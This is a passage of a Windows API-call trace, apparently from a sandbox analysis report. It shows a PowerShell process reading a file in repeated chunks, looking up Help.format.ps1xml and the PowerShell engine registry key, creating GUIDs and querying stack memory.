	[0430.621] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.621] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.621] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.621] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.622] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.623] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.623] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.623] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.623] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.623] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.623] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.624] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.625] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.625] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.625] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.680] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.681] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.681] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.681] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.681] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.681] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.681] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.682] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.683] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.684] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.685] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.685] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0xf37, lpOverlapped=0x0) returned 1
	[0430.685] ReadFile (in: hFile=0x320, lpBuffer=0x3687ebf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3687ebf*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.685] ReadFile (in: hFile=0x320, lpBuffer=0x3688820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3688820*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.685] SetErrorMode (uMode=0x1) returned 0x1
	[0430.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0430.685] SetErrorMode (uMode=0x1) returned 0x1
	[0430.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.686] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x320) returned 0x0
	[0430.686] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.686] CoTaskMemAlloc (cb=0x5a) returned 0x48e830
	[0430.686] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e830, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.686] CoTaskMemFree (pv=0x48e830) 
	[0430.686] RegCloseKey (hKey=0x320) returned 0x0
	[0430.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.691] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x9984dd89, Data2=0x2ce, Data3=0x4713, Data4=([0]=0x82, [1]=0x98, [2]=0x49, [3]=0x5, [4]=0x21, [5]=0xe4, [6]=0x8c, [7]=0xbd))) returned 0x0
	[0430.691] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf2c014f4, Data2=0x27a9, Data3=0x4f08, Data4=([0]=0x9d, [1]=0xf5, [2]=0xe6, [3]=0xe7, [4]=0x61, [5]=0xc3, [6]=0x4d, [7]=0x58))) returned 0x0
	[0430.699] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xbe98a5fe, Data2=0x93f4, Data3=0x459a, Data4=([0]=0xb0, [1]=0xa4, [2]=0x43, [3]=0x51, [4]=0x13, [5]=0x53, [6]=0xed, [7]=0x23))) returned 0x0
	[0430.699] VirtualQuery (in: lpAddress=0x24b260, lpBuffer=0x24c120, dwLength=0x30 | out: lpBuffer=0x24c120*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.699] VirtualQuery (in: lpAddress=0x24b2f0, lpBuffer=0x24c1b0, dwLength=0x30 | out: lpBuffer=0x24c1b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.699] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.700] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.700] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.700] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.700] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.701] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.702] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.702] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.702] VirtualQuery (in: lpAddress=0x24b6a0, lpBuffer=0x24c560, dwLength=0x30 | out: lpBuffer=0x24c560*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.702] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.702] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.703] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.703] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.703] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x2028717c, Data2=0x10e6, Data3=0x436c, Data4=([0]=0xa7, [1]=0xb9, [2]=0xcf, [3]=0x30, [4]=0x28, [5]=0x6, [6]=0x96, [7]=0xed))) returned 0x0
	[0430.704] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.704] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.704] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.704] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
